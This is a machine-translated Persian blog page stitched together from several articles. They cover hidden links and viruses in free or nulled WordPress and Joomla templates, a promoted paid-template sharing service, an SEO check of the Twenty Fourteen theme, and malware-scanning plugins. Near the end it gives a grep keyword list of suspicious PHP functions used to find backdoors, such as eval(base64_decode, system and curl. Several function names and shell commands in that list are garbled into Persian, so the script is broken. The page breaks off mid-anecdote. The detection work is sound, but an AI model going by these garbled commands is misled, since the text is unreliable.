با سلام خدمت خوانندگان محترم سایت وبلاگ. امروزه تعداد کمی از وب مسترها هستند که وب سایت خود را خودشان طراحی می کنند (با استفاده از Html خالص، موتور خود، یا حداقل با استفاده از قالب های خود ساخته برای CMS). به طور کلی، این درست است، زیرا همه نمی توانند چیزی ارزشمند خلق کنند - این به استعداد یک طراح نیاز دارد. بیشتر اوقات معلوم می شود که حداقل "نه خیلی خوب" و گاهی اوقات "به سادگی وحشتناک" است.

به همین دلیل است که قالب‌ها یا تم‌های طراحی (در موتورهای مختلف، «اسکین‌ها» را می‌توان با عبارات مختلفی نام برد) برای CMS محبوب بسیار گسترده شده است. به خصوص بسیاری از این خوبی ها را می توان در اینترنت برای جوملا و وردپرس یافت، زیرا این به درستی، هم در RuNet و هم در اینترنت بورژوازی وجود دارد.

در واقع، در حال حاضر منابع روسی زبان بسیار زیادی با کاتالوگ های قالب های آماده وجود دارد. خوب، در بورژوازی هیچ راهی برای شمارش آنها وجود ندارد. همه چیز بسیار عالی به نظر می رسد - موتور را نصب کنید، یک الگوی مناسب پیدا کنید (این راز نیست که یافتن قالب های پولی به صورت رایگان چندان دشوار نیست)، آن را دانلود کنید و از طراحی حرفه ای وب سایت جدید خود لذت ببرید. تنها چیزی که باقی می ماند این است که محتوای ارزشمندی را به آن اضافه کنید و می توانید شاهد افزایش محبوبیت منبع خود در اینترنت باشید.

اما همه چیز به این سادگی و واضح نیست. زمانی که مدت ها پیش مقاله ای نوشتم، به طور منظم از خوانندگان توصیه هایی برای حذف این یا آن سرویس از لیست دریافت کردم، زیرا در مواردی که در آنجا پست شده است لینک های مخفی یا حتی ویروس ها در قالب ها یافت می شوند. معلوم می شود که این ضرب المثل درست است - پنیر رایگان فقط در تله موش یافت می شود. توسعه‌دهندگان قالب‌های رایگان (یا کسانی که قالب‌های پولی را «صفر» می‌کنند) به سادگی از این راه درآمد کسب می‌کنند و با قضاوت بر اساس دامنه، مقدار زیادی از آن را به دست می‌آورند.

پیوندهای مخفی به منابع شخص ثالث (و اغلب در لیست سیاه موتورهای جستجو) و حتی بیشتر از آن ویروس ها، می توانند تمام امیدها برای ارتقای منبع شما را از بین ببرند (یا به طور جدی آنها را تضعیف کنند و اعصاب شما را خراب کنند). برای این شما می توانید، یا. چگونه می توانید هنگام انتخاب یک الگو از خود در برابر همه این موارد محافظت کنید؟

اشکال از قالب های رایگان جوملا و وردپرس چیست؟

از تجربه خودم می توانم بگویم که برای یک "آماتور" رقابت با یک "حرفه ای" بسیار دشوار است. در همان ابتدای انتشار، پیوندی به مقاله ای در مورد ویروس هایی که بیشتر سایت های من را آلوده کرده بودند، ارائه دادم. این بیش از دو سال پیش اتفاق افتاد، و در طول این مدت من بیش از یک بار مبارزه حماسی را برای "خلاصه کد" تکرار کردم، اما عودها هنوز با منظمی رشک برانگیز در تعدادی از منابع آلوده رخ می دهد (یا هرزنامه از آنها ارسال می شود، یا درگاه شکل می گیرد، سپس چیزی کاملاً غیرقابل درک برای من در حال رخ دادن است، که منجر به یک بار بسیار بزرگ در میزبانی می شود).

در عین حال، من از تمام روش های موجود برای یک "noob" برای جستجوی پوسته ها و سایر درهای پشتی در کد این سایت ها استفاده می کنم، اما دوباره تکرار می کنم که یک آماتور به سادگی نمی تواند با یک حرفه ای رقابت کند. بنابراین، اگر فکر می کنید که می توانید به راحتی ویروسی را که از طریق یک الگو نفوذ کرده است حذف کنید، به احتمال زیاد در اشتباه هستید. این یک موضوع بسیار دلخراش و بسیار آزاردهنده است (زمانی که فعالیت ویروسی، با وجود تمام تلاش های شما، بارها و بارها ظاهر می شود) و زمان و تلاش زیادی را می طلبد.

همینطور همچنین برای پیوندهای مخفی اعمال می شود. خوب است اگر با گزینه ای برای معرفی آنها از دوران گذشته روبرو شوید، زمانی که می توانید به سادگی مکانی را برای درج آنها پیدا کنید و برای همیشه از شر آنها خلاص شوید و در نهایت یک قالب تمیز و رایگان دریافت کنید. در بیشتر موارد، همه چیز بسیار پیچیده تر است. برای یافتن محل درج لینک های مخفی به نرم افزاری نیاز دارید (مثلاً پلاگین TAC)، اما همه کاره نیست، زیرا تجارت توزیع پیوندها از طریق قالب های رایگان و پولی (هک شده) برای جوملا و وردپرس درآمد بسیار خوبی به همراه دارد. که افرادی را که آن را تمرین می کنند تشویق می کند تا راه حل های جدیدی را جستجو کنند که باعث می شود "نشانک" آنها کمتر قابل توجه باشد.

در واقع، امروزه بررسی سریع یک الگو برای ایجاد "لینک های چپ" می تواند بسیار دشوار باشد. به عنوان مثال، شما یک قالب را دانلود کردید، آن را در سایت قرار دادید، محتوا اضافه کردید و تصمیم گرفتید ببینید آیا پیوندهای خارجی مشکوک (که توسط شما وارد نشده است) از آن ظاهر می شود یا خیر. هیچ کدام از آنها وجود ندارد. شما خوشحال هستید، این مشکل را فراموش کرده اید، مشغول پر کردن سایت و تبلیغ آن هستید، و سپس ناگهان به طور تصادفی (به تنهایی یا پس از سیگنال موتورهای جستجو به صورت فیلتر یا ممنوع) متوجه می شوید که هنوز پیوندهای مخفی وجود دارد. و آنها منجر به چنین "لغزی" می شوند، که شما خود هرگز فکر نمی کنید به آن اشاره کنید.

توهین آمیز ترین چیز در مورد این است که برای حذف فیلتر و "سفید کردن" سایت در چشم موتورهای جستجوممکن است زمان بسیار طولانی (در برخی موارد ماهها و حتی سالها) طول بکشد. اما نکته اینجاست که توسعه دهندگان چنین "نشانک ها" می دانند که شما در مورد آنها می دانید و پس از نصب الگو سایت را برای "انواع موارد اضافی بد" بررسی می کنند. بنابراین، آنها شروع تولید همین پیوندها را برای مدتی کند می کنند، به نظر آنها برای اینکه حتی مشکوک ترین کاربر نیز به خلوص قالبی که به صورت رایگان دریافت کرده است، باور داشته باشد کافی است.

علاوه بر این، پیوندهای مخفی اکنون به گونه ای رمزگذاری می شوند که با استفاده از کلمات md5 یا base64 جستجو نمی شوند (اغلب آنها از یک منبع خارجی بارگذاری می شوند). فقط مجموعه ای از حروف و کاراکترهای خاص است که با جستجو در همه فایل های قالب نمی توان آنها را پیدا کرد. و ممکن است بیش از صد مورد از این فایل ها وجود داشته باشد. به علاوه، پیوندها بلافاصله ظاهر نمی شوند. یعنی در واقع غیرممکن است که یک وب مستر (متوسط) آنها را در مرحله ایجاد یک وب سایت تشخیص دهد.

خوب، برای جلوگیری از عفونت از طریق الگو، من من ترجیح می دهم پول بدهمتا بعداً با یک سری مشکلات دست و پنجه نرم نکنید. یک چیز دیگر این است که شما می توانید پول زیادی بپردازید، یا می توانید پول زیادی بپردازید. من شخصاً گزینه دوم را انتخاب می کنم، اما ابتدا جوهر اولی را توضیح می دهم.

یه چیزی البته پیدا میشه و در مخازن رسمی این موتورها(در مورد آن بخوانید و به وب سایت رسمی برنامه های افزودنی جوملا بروید)، اما اولاً، انتخاب در آنجا به طور قابل توجهی محدود است و ثانیاً هزاران سایت دیگر در سراسر جهان با همان "لباس" پوشیده می شوند که تا حدودی کاهش می دهد. منحصر به فرد بودن پروژه شما هم از دید بازدیدکنندگان و هم از دید موتورهای جستجو.

با این حال، شرکت های حرفه ای زیادی در دنیا وجود دارند که قالب های پولی جوملا و وردپرس را توسعه می دهند. پیشینی ()، آنها نباید نشانک داشته باشند، در غیر این صورت فوراً اقتدار و اعتماد مشتریان را از دست خواهند داد. با این حال، قیمت یک قالب بسته به عملکرد و تازگی آن می تواند 50-100 دلار باشد.

علاوه بر این، ممکن است مشکلاتی در پرداخت ایجاد شود (شما باید ریسک کنید و با پرداخت مستقیم از کارت پلاستیکی خرید کنید). با این حال، در نتیجه یک الگوی عمداً "تمیز" دریافت خواهید کرد که خوب است. درست است، پشتیبانی فنی همراه با آن تنها در صورتی مرتبط خواهد بود که زبان ارائه شده را بدانید. در بیشتر موارد، دانش زبان روسی در این مورد به شما کمکی نمی کند.

من گزینه دوم را به دلیل سودآوری بالاتر آن (نسبت پول خرج شده به فرصت های دریافتی) بهتر دوست دارم ، اگرچه در رابطه با توسعه دهندگان کاملاً "سفید شسته" نیست. ماهیت آن جوملا و وردپرس است تحت مجوز GNU/GPL توزیع شده است، یعنی مجوزهای نرم افزار آزاد (این گونه نرم افزارها قابل استفاده، کپی، اصلاح و توزیع هستند). در واقع، قبلاً در مقاله ای در مورد قالب های جوملا که در همان ابتدا ذکر شد، در این مورد نوشتم.

بدون پرداختن به جزئیات، نکته اینجاست که افزونه ها (قالب ها، پلاگین ها و غیره) برای این موتورها نمی توانند دارایی خصوصی نویسندگان باشند. بله، شما می توانید برای آنها مطالبه پرداخت کنید، اما دیگر امکان مجازات یا پیگرد قانونی برای استفاده یا توزیع غیرمجاز این افزونه ها وجود نخواهد داشت. با وجود این، بازار افزونه های پولی برای جوملا و وردپرس بسیار بزرگ است توسط قانون کپی رایت محافظت نمی شود. برعکس، مجوز GNU/GPL 100% از شما در برابر توسعه دهنده محافظت می کند.

به هر حال، بسیاری از شرکت های توسعه، دسترسی به قالب های خود را با اشتراک فراهم می کنند. آن ها شما مبلغ مشخصی را پرداخت می کنید و برای مدت زمان معینی می توانید تمام ساخته های آنها (قالب ها یا افزونه ها) را به طور مداوم دانلود کرده و به استفاده از آنها ادامه دهید. در واقع، راه دوم برای به دست آوردن ایمن تم برای وردپرس و همچنین قالب های جوملا، تقریباً بر همین اصل استوار است.

چندی پیش، دوست من که در تعدادی از مقالات از او نام بردم، "انگشت خود را به سمت او نشانه رفت" (او چندین سال است که به دنبال گزینه ایده آل برای ساخت یک فروشگاه آنلاین است و در این مسیر موارد زیادی را پیدا می کند. چیزهایی که برای من جالب به نظر می رسند و به طور فعال در آینده استفاده می شوند). ما در مورد ادغام قالب ها و برنامه های افزودنی ممتاز صحبت می کنیم CmsHeaven.org .

ماهیت جمع آوری کمک مالی بسیار ساده است - یک محصول بخرید و آن را بین همه کسانی که در جمع آوری کمک مالی شرکت کردند توزیع کنید. CmsHeaven.org این طرح را حتی بیشتر ساده کرده است - نیازی به هزینه کردن برای قالب‌ها یا برنامه‌های افزودنی جداگانه نیست. شما به سادگی برای دسترسی موقت به کل کاتالوگی که این سرویس در اختیار دارد (چند هزار عنوان، تقسیم شده برای سهولت جستجو بر اساس موتورها، نویسندگان و موضوعات) پرداخت می کنید.

هر یک از محصولات ارائه شده صادقانه از توسعه دهندگان با پول سپرده گذاران خریداری شده است (الگوهای رایگان نیز وجود دارد، اما دوباره توسط مارک های معروف ارائه می شوند که برای اهداف تبلیغاتی به آنها نیاز دارند). و آنچه مهم است، سازمان دهندگان دائماً کاتالوگ را با نسخه های جدید به روز می کنند (به قول خودشان در گرما روز) که باید برای مدت طولانی در عموم منتظر بمانند. بسیاری از مردم این را دوست خواهند داشت.

به طور کلی، این تعاونی است که می توانید در آن عضو شوید و از تمام مزایای آن بهره مند شوید. اما با برخی محدودیت ها. واقعیت این است که برگزارکنندگان به خوبی می‌دانند که بدون اعمال محدودیت، کل کاتالوگ آنها در مدت زمان زیادی به اطلاع عموم می‌رسد. بنابراین صورت می گیرد محدود به 36 بارگیری در ماه. این برای یک وب مستر معمولی و حتی یک شرکت ایجاد وب سایت کاملاً کافی است.

این تضمین می کند غیبتدر پسوندها و قالب های ارائه شده "نشانک ها"(لینک‌های مخفی، ویروس‌ها، تروجان‌ها و اسنیچ‌هایی که توسعه‌دهنده را با استفاده از قالب خود در مورد سایت مطلع می‌کنند). با توجه به این موضوع، فقط محصولاتی از برندهای معروف با منبع باز خریداری می شود که همه این موارد را می توان بررسی کرد و در صورت لزوم حذف کرد.

برخی از برنامه‌های افزودنی به روسی ترجمه شده‌اند، و اگر مشکلی در نصب یا پیکربندی ایجاد شود، که اغلب بسیار ضروری است (شما احتمالاً بیش از یک بار اینترنت را در جستجوی راه‌حلی برای مشکلی که به‌طور ناگهانی به وجود آمده است، جستجو کرده‌اید) . به هر حال، این چیزی است که موتورهای رایگان را از موتورهای پولی متمایز می کند، که هیچ پشتیبانی کاربر به این صورت وجود ندارد.

و شما قادر خواهید بود محصولات مورد علاقه خود را با سرعت معمولی و بدون مشاهده تبلیغات در سرویس های میزبانی فایل دانلود کنید. این یک چیز بی اهمیت است، زیرا برای به دست آوردن "ناز" مورد علاقه می توانید کوه ها را جابجا کنید، و نه فقط با یک سرویس میزبانی فایل مبارزه کنید، بلکه این چیزهای کوچک هستند که راحتی را ایجاد می کنند.

به طور کلی، من این ایده و اجرای آن را خیلی دوست داشتم، اما آیا باید از قالب های رایگان مخازن جوملا و وردپرس استفاده کنم، آیا باید در CmsHeaven.org عضو شوم یا قالب ها را مستقیماً از توسعه دهندگان بخرم؟ خودت باید تصمیم بگیری. فقط «به شما التماس می‌کنم، شب‌ها گوجه‌فرنگی خام نخورید»، یعنی محصولات رایگان را از هیچ منبع «شگفت‌انگیز» دانلود نکنید، زیرا ممکن است با مشکلات زیادی روبرو شوید. آیا به آن نیاز دارید؟

موفق باشی! به زودی شما را در صفحات سایت وبلاگ می بینیم

ممکن است علاقه مند باشید

نحوه درج کد شمارنده بازدید در سایتی که جوملا دارد با استفاده از ماژول کد HTML سفارشی یا مستقیماً در یک الگو
چگونه خودتان بدون دانش Html، CSS و PHP یک وب سایت کارت ویزیت حرفه ای ایجاد کنید؟ پاسخ: MotoCMS!
چگونه یک قالب تطبیقی ​​برای یک وب سایت آینده، و همراه با آن یک CMS بصری و سریع برای راه اندازی دریافت کنیم
10 اشتباه مرگبار هنگام نوشتن و انتشار مقاله
ایجاد آیتم منو در جوملا برای ورود به انجمن و انتقال ثبت نام کاربر از SMF به سایت
راه اندازی JFusion برای ترکیب انجمن SMF و سایت جوملا
ماژول های JFusion برای نمایش پیام ها از انجمن در وب سایت و همچنین ایجاد دکمه در SMF برای بازگشت به جوملا WebPoint PRO یک تم وردپرس پاسخگو با عملکرد گسترده و بهینه سازی فنی مناسب برای موتورهای جستجو است
Share42 - اسکریپتی برای اضافه کردن دکمه ها و نشانک های شبکه های اجتماعی به سایت (یک گزینه پانل شناور وجود دارد)
نصب انجمن SMF - ادغام جوملا 1.5 و انجمن ماشین های ساده با استفاده از مؤلفه JFusion

پس از اینکه قالبی را برای نصب در سایت وردپرس خود انتخاب کردید، ارزش آن را دارد که طرح بندی آن را برای مطابقت با قوانین اولیه سئو (بهینه سازی) بررسی کنید. به عنوان مثال، قالب جعبه ای "Twenty Fourteen" به گونه ای طراحی شده است که عناوین ویجت در برچسب ها نمایش داده می شوند.

یافتن یک قالب آماده وردپرس که کاملاً نیازهای شما را برآورده کند بسیار دشوار است. اغلب، شما الگوی انتخابی را دوست دارید، اما از طرح رنگ آن راضی نیستید یا مکان نوار کناری، هدر، فونت و غیره را دوست ندارید. پلتفرم WP تمامی امکانات را برای تغییر قالب وردپرس متناسب با نیاز شما دارد.

به عنوان مثال، بیایید یک قالب وردپرس جعبه ای به نام “Twenty Fourteen” را تغییر دهیم. این قالب به عنوان یک مثال عملی خواهد بود که در آن می توانید تمام تفاوت های ظریف و نه تنها تنظیم دقیق قالب های وردپرس را مشاهده کنید.

در حال آماده شدن برای ویرایش الگو

قبل از هر کاری با کد وردپرس، از جمله تغییر قالب کار، باید انجام دهید و در دسترس داشته باشید:

• (کاتالوگ و پایگاه داده) ;
• یک نسخه پشتیبان از الگوی کار (قابل ویرایش).

قالب باید قبلاً در تب Appearance→Customize پیکربندی شده باشد.

توجه داشته باشید:برای ایجاد تغییرات دائمی در قالب، باید به . اجرای بر روی یک تم کودک وردپرس به شما امکان می دهد بدون از دست دادن تغییرات خود، قالب را به روز کنید.

چگونه قالب وردپرس “Twenty Fourteen” را برای خود شخصی سازی کنید

من سعی خواهم کرد اصل تغییر یک قالب را نشان دهم، که به شما امکان می دهد تغییرات خود را در هر قالب وردپرس ایجاد کنید.

بنابراین، وظیفه:یک قالب "بیست چهارده" عکس 1 وجود دارد، ما تغییرات سفارشی در قالب ایجاد می کنیم و در همان زمان طرح قالب را بررسی می کنیم تا از مطابقت با قوانین بهینه سازی SEO اطمینان حاصل کنیم.

توجه داشته باشید:توجه داشته باشم که نویسندگان بسیاری از الگوها تنظیمات قابل تنظیم مجدد را برای قالب خود ایجاد می کنند و رابط تنظیمات را در یک برگه جداگانه نمایش می دهند. هنگام کار با چنین قالب هایی، به راحتی می توانید تنظیمات قالب سفارشی را بدون تغییر کد قالب تنظیم کنید. این گزینه ای نیست که در این مقاله توضیح داده شده است.

بررسی طرح بندی قالب برای قوانین سئو

بیایید ابتدا به چیدمان قالب نگاه کنیم. قبل از بررسی، تنظیمات قالب ارائه شده را تنظیم کنید.

برای بررسی طرح بندی برای مطابقت با قوانین سئو، به موارد زیر نیاز داریم:

• هر ویجتی را در نوار (های) جانبی الگو قرار دهید. بگذارید یک تقویم باشد. ما قطعاً به ویجت یک نام خواهیم داد.
• یک صفحه آزمایشی و یک پست سایت آزمایشی ایجاد کنید.

مراحل بررسی طرح قالب برای قوانین سئو

مرحله 1: بررسی صفحه اصلی

مهم! در هیچ صفحه ای از سایت نباید بیش از دو تگ h1 وجود داشته باشد. یک درب بازکن

، بسته شدن دوم

، این نیاز به تعمیر شدن دارد. تعمیر درست در زیر است.

تکرار می کنم!در هیچ صفحه ای از سایت نباید بیش از دو تگ h1 وجود داشته باشد. یک درب بازکن

، بسته شدن دوم

مرحله 2. تست صفحه پست تست

بعد از صفحه اصلی سایت، پست تست سایت را باز می کنیم. در اینجا ما بررسی می کنیم که فقط عنوان پست در تگ های h1 پیچیده شده باشد. ما بررسی را مانند پست سایت انجام می دهیم. فقط عنوان صفحه باید با تگ های h1 پیچیده شود.

مرحله 3: بررسی ابزارک ها

به طور مشابه، به برچسب‌های عنوان ابزارک‌ها در نوار کناری و پاورقی نگاه کنید.

نتایج بررسی طرح

در نتیجه، با بررسی طرح‌بندی قالب در این الگو، متوجه شدیم که سرصفحه‌های ویجت در فوتر و نوار کناری سایت در تگ‌های h1 پیچیده شده‌اند. این نیاز به تعمیر شدن دارد.

اگر متوجه شدیم که در صفحه اصلی اعلان های مقاله در تگ های h1 نمایش داده می شود، یعنی در صفحه آخرین پست ها چندین عنوان در h1 وجود دارد، مقاله را می خوانیم و این خطای چیدمان سئو را برطرف می کنیم.

موضوع مقاله بزرگتر از چیزی بود که انتظار داشتم، بنابراین باید قالب وردپرس را متناسب با خودم تغییر دهم، یعنی ظاهر آن را تغییر دهم، در مقاله بعدی این کار را انجام خواهیم داد. ابتدا می توانید مقالات: قوانین چیدمان یک فایل سبک آبشاری وردپرس را بخوانید.

وردپرس محبوب ترین موتور برای ایجاد وب سایت ها و وبلاگ های اطلاعاتی مختلف است. امنیت وب سایت شما بیشتر از امنیت داده های شماست. این بسیار مهمتر است، زیرا ایمنی همه کاربرانی است که منبع شما را می خوانند و به آن اعتماد دارند. به همین دلیل بسیار مهم است که سایت به ویروس یا هر کد مخرب دیگری آلوده نشود.

ما در یکی از مقالات زیر به نحوه محافظت از وردپرس در برابر هک شدن می پردازیم، اما اکنون می خواهم به شما بگویم که چگونه یک وب سایت وردپرس را برای ویروس ها و کدهای مخرب بررسی کنید تا مطمئن شوید که همه چیز ایمن است.

اولین گزینه ای که به ذهن می رسد این است که شما توسط هکرها هک شده اید و درهای پشتی آنها را در کد سایت خود قرار داده اید تا بتوانید اسپم ارسال کنید، لینک ها را قرار دهید و موارد بد دیگر. گاهی اوقات این اتفاق می افتد، اما اگر نرم افزار را به موقع به روز کنید، این یک مورد نسبتاً نادر است.

هزاران تم رایگان وردپرس و افزونه های مختلف وجود دارد، و این می تواند یک تهدید باشد. وقتی یک قالب را از سایت وردپرس دانلود می کنید یک چیز است و وقتی آن را در سایت سمت چپ پیدا می کنید چیز دیگری است. توسعه دهندگان بی پروا می توانند کدهای مخرب مختلفی را در محصولات خود جاسازی کنند. اگر قالب‌های ممتاز را به‌صورت رایگان دانلود کنید، خطر حتی بیشتر می‌شود، جایی که هکرها، بدون خطر کردن چیزی، می‌توانند نوعی حفره امنیتی اضافه کنند که از طریق آن نفوذ کرده و آنچه را که نیاز دارند انجام دهند. به همین دلیل است که بررسی یک سایت وردپرس برای ویروس ها بسیار مهم است.

بررسی یک سایت وردپرس برای ویروس

اولین چیزی که هنگام بررسی یک سایت باید به آن توجه کنید ویروس نیست، اینها افزونه های وردپرس هستند. به سرعت و به راحتی، می توانید سایت خود را اسکن کنید و قسمت های مشکوکی از کد را پیدا کنید که ارزش توجه به آن ها را دارند، خواه در قالب، افزونه یا هسته خود Wodpress باشند. بیایید به چند مورد از محبوب ترین افزونه ها نگاه کنیم:

1.TOC

این افزونه بسیار ساده تمام تم های نصب شده در سایت شما را بررسی می کند تا ببیند آیا حاوی کد مخرب هستند یا خیر. این افزونه پیوندهای مخفی رمزگذاری شده با استفاده از درج کد base64 را شناسایی می کند و همچنین اطلاعات دقیق در مورد مشکلات پیدا شده را نمایش می دهد. اغلب، کدهای یافت شده ویروس نیستند، اما به طور بالقوه می توانند خطرناک باشند، بنابراین باید به آنها توجه کنید.

باز کن "ظاهر" -> "TAC"سپس صبر کنید تا همه موضوعات بررسی شوند.

2. اسکنر VIP

بسیار شبیه به اسکنر موضوع TOC است، اما اطلاعات دقیق تری را نمایش می دهد. قابلیت های مشابه برای شناسایی لینک ها، کدهای مخفی و سایر درج های مخرب. کافیست آیتم VIP Scanner را در قسمت ابزار باز کنید و نتیجه را تحلیل کنید.

ممکن است کافی باشد فایل های غیر ضروری را حذف کنید، مثلا desktop.ini. یا باید با جزئیات بیشتری به اتفاقاتی که در فایل ها با استفاده از base64 می افتد نگاه کنید.

3. ضد بدافزار از GOTMLS.NET

این افزونه به شما این امکان را می دهد که نه تنها تم ها و هسته سایت را برای ویروس ها اسکن کنید، بلکه از سایت در برابر رمزهای عبور brute force و حملات مختلف XSS، SQLInj نیز محافظت کنید. جستجو بر اساس امضاها و آسیب پذیری های شناخته شده انجام می شود. برخی از آسیب پذیری ها را می توان در سایت رفع کرد. برای شروع اسکن فایل ها را باز کنید "ضد مالوار"در منوی کناری کلیک کنید "اجرای اسکن":

قبل از اینکه بتوانید اسکن را اجرا کنید، باید پایگاه داده امضای خود را به روز کنید.

4. Wordfence

این یکی از محبوب ترین افزونه ها برای امنیت وردپرس و اسکن بدافزار است. علاوه بر اسکنر، که می‌تواند بیشتر بوکمارک‌ها را در کد وردپرس پیدا کند، محافظت دائمی در برابر انواع مختلف حملات و نیروی بیرحمانه رمز عبور وجود دارد. افزونه در حین جستجو مشکلات احتمالی افزونه ها و تم های مختلف را پیدا کرده و نیاز به به روز رسانی وردپرس را گزارش می دهد.

برگه را باز کنید "WPDefence"در منوی کناری و سپس به تب بروید "اسکن"و فشار دهید "شروع اسکن":

اسکن ممکن است کمی طول بکشد، اما پس از تکمیل، گزارش مفصلی از مشکلات پیدا شده را مشاهده خواهید کرد.

5. آنتی ویروس

این افزونه ساده دیگری است که قالب وب سایت شما را برای کدهای مخرب اسکن می کند. نقطه ضعف این است که فقط الگوی فعلی اسکن می شود، اما اطلاعات با جزئیات کافی نمایش داده می شود. شما تمام عملکردهای خطرناکی را که در موضوع هستند مشاهده خواهید کرد و سپس می توانید با جزئیات تجزیه و تحلیل کنید که آیا آنها خطری دارند یا خیر. یک مورد پیدا کنید "آنتی ویروس"در تنظیمات و سپس کلیک کنید "اکنون الگوهای تم را اسکن کنید":

6. بررسی یکپارچگی

همچنین توصیه می شود که یکپارچگی فایل های وردپرس را بررسی کنید، در صورتی که ویروس قبلاً در جایی نوشته شده است. برای این کار می توانید از افزونه Integrity Checker استفاده کنید. تمام فایل های هسته، افزونه و قالب را برای تغییرات بررسی می کند. در پایان اسکن، اطلاعاتی در مورد فایل های تغییر یافته مشاهده خواهید کرد.

خدمات آنلاین

همچنین چندین سرویس آنلاین وجود دارد که به شما امکان می دهد یک سایت وردپرس را برای ویروس ها بررسی کنید یا فقط الگو را بررسی کنید. در اینجا به برخی از آنها اشاره می کنیم:

themecheck.org- شما آرشیو تم را دانلود می کنید و می توانید تمام هشدارهای مربوط به عملکردهای مخرب احتمالی استفاده شده در آن را مشاهده کنید. شما نه تنها می توانید اطلاعات مربوط به موضوع خود را مشاهده کنید، بلکه می توانید سایر تم های آپلود شده توسط کاربران دیگر و همچنین نسخه های مختلف تم را مشاهده کنید. هرچه افزونه ها پیدا کنند می توانند توسط این سایت پیدا شوند. بررسی قالب وردپرس نیز بسیار مهم است.

virustotal.com- یک منبع شناخته شده که می توانید وب سایت یا فایل قالب خود را برای ویروس ها بررسی کنید.

ReScan.pro- اسکن یک سایت وردپرس برای ویروس ها با استفاده از این سرویس رایگان است؛ تجزیه و تحلیل استاتیک و پویا برای شناسایی تغییر مسیرهای احتمالی انجام می شود؛ اسکنر صفحات سایت را باز می کند. سایت را در برابر لیست های سیاه مختلف بررسی می کند.

sitecheck.sucuri.net- یک سرویس ساده برای اسکن سایت ها و موضوعات برای ویروس ها. یک افزونه برای وردپرس وجود دارد. لینک ها و اسکریپت های خطرناک را شناسایی می کند.

بررسی دستی

هیچ چیز نمی تواند بهتر از بررسی دستی باشد. لینوکس دارای این ابزار شگفت انگیز grep است که به شما امکان می دهد تا برای یافتن رشته های دلخواه در یک پوشه با فایل ها جستجو کنید. باقی مانده است که بفهمیم به دنبال چه چیزی خواهیم بود:

eval - این تابع به شما امکان می دهد کدهای PHP دلخواه را اجرا کنید، توسط محصولاتی که به خود احترام می گذارند استفاده نمی شود؛ اگر یکی از پلاگین ها یا موضوعی از این تابع استفاده کند، تقریباً 100٪ احتمال دارد که حاوی ویروس باشد.

• base64_decode- توابع رمزگذاری را می توان همراه با eval برای پنهان کردن کدهای مخرب استفاده کرد، اما می توان از آنها برای اهداف صلح آمیز نیز استفاده کرد، بنابراین مراقب باشید.
• sha1- روش دیگری برای رمزگذاری کدهای مخرب؛
• gzinflate- تابع فشرده سازی، اهداف مشابه، همراه با eval، به عنوان مثال، gzinflate(base64_decode(code);
• strrev- خط را نه قبل از آن به عقب می چرخاند، زیرا می توان از گزینه ای برای رمزگذاری اولیه استفاده کرد.
• چاپ- خروجی اطلاعات به مرورگر، همراه با gzinflate یا base64_decode خطرناک است.
• file_put_contents- خود وردپرس یا افزونه ها همچنان می توانند فایل ها را در سیستم فایل ایجاد کنند، اما اگر موضوع این کار را انجام می دهد، باید مراقب باشید و بررسی کنید که چرا این کار را انجام می دهد، زیرا ویروس ها می توانند نصب شوند.
• file_get_contents- در بیشتر موارد برای اهداف صلح آمیز استفاده می شود، اما می توان از آن برای دانلود کدهای مخرب یا خواندن اطلاعات از فایل ها استفاده کرد.
• حلقه- همان داستان؛
• باز کردن- فایلی را برای نوشتن باز می کند، شما هرگز نمی دانید برای چه هدفی.
• سیستم- این تابع دستوری را در یک سیستم لینوکس اجرا می کند، اگر خود یک تم، افزونه یا وردپرس این کار را انجام دهد، به احتمال زیاد یک ویروس در آنجا وجود دارد.
• پیوند نمادین- پیوندهای نمادین را در سیستم ایجاد می کند، شاید ویروس در تلاش است تا سیستم فایل اصلی را از خارج در دسترس قرار دهد.
• کپی 🀄- یک فایل را از یک مکان به مکان دیگر کپی می کند.
• getcwd- نام دایرکتوری کاری فعلی را برمی گرداند.
• cwd- پوشه کاری فعلی را تغییر می دهد.
• ini_get- اطلاعاتی در مورد تنظیمات PHP دریافت می کند، اغلب برای اهداف صلح آمیز، اما شما هرگز نمی دانید.
• error_reporting(0)- خروجی هر پیام خطا را غیرفعال می کند.
• window.top.location.href- تابع جاوا اسکریپت که برای تغییر مسیر به صفحات دیگر استفاده می شود.
• هک شده است- بنابراین، فقط در مورد، ما چک می کنیم، ناگهان، خود هکر تصمیم گرفت به ما بگوید.

می توانید هر کلمه را با دستوری مانند زیر جایگزین کنید:

grep -R "هک شده" /var/www/path/to/files/wordpress/wp-content/

یا از یک اسکریپت ساده استفاده کنید که همه کلمات را همزمان جستجو می کند:

values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
کپی 🀄(
ارزشیابی(
سیستم(
پیوند نمادین(
error_reporting(0)
چاپ
file_get_contents(
file_put_contents(
فوپن(
هک شده"

سی دی /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

سلام دوستان. آیا مطمئن هستید که قالب رایگان وردپرسی که برای وب سایت ها و وبلاگ های خود استفاده می کنید واقعاً ایمن است و حاوی تهدیدات پنهان یا کد مخرب نیست؟ آیا در این مورد کاملاً مطمئن هستید؟ کاملا؟)

شما فکر می کنید که قالب را اجرا کرده اید، پیوندهای مخفی را از آن حذف کرده اید و کار تمام شده است. شما به صورت دوره ای فایل های سایت را با یک آنتی ویروس اسکن می کنید، به ابزارهای وب مستر Yandex در برگه امنیت نگاه می کنید و از دیدن پیام در آنجا راحت می شوید: هیچ کد مخربی در سایت شناسایی نشد«.

من هم همین فکر را کردم. دوست ندارم ناراحتت کنم اما...

کد خطرناک مخفی در قالب های رایگان وردپرس

این نامه ای است که هفته گذشته از طریق ایمیل از شرکت میزبان خود دریافت کردم. اخیراً آنها برای جستجوی محتوای مخرب همه فایل های سایت را به طور منظم بررسی کرده اند و این محتوا را در من پیدا کردند!

همه چیز از زمانی شروع شد که یک روز بعدازظهر به وب‌سایت خود رفتم و نتوانستم آن را راه‌اندازی کنم - یک پیام توهین‌آمیز درباره فایل‌هایی با پسوند php پیدا نشد. با کمی تنش، رفتم تا محتویات پوشه را با سایت موجود در هاست مطالعه کنم و بلافاصله مشکلی را کشف کردم - فایل قالب من fuctions.php به functions.php.malware تغییر نام داد که به نظر می رسید به طور مبهم اشاره می کند - یک آنتی ویروس وجود داشت. اینجا کار می کنم یا چیزی شبیه به آن) با مراجعه به نامه، گزارش فوق را از میزبان پیدا کردم.

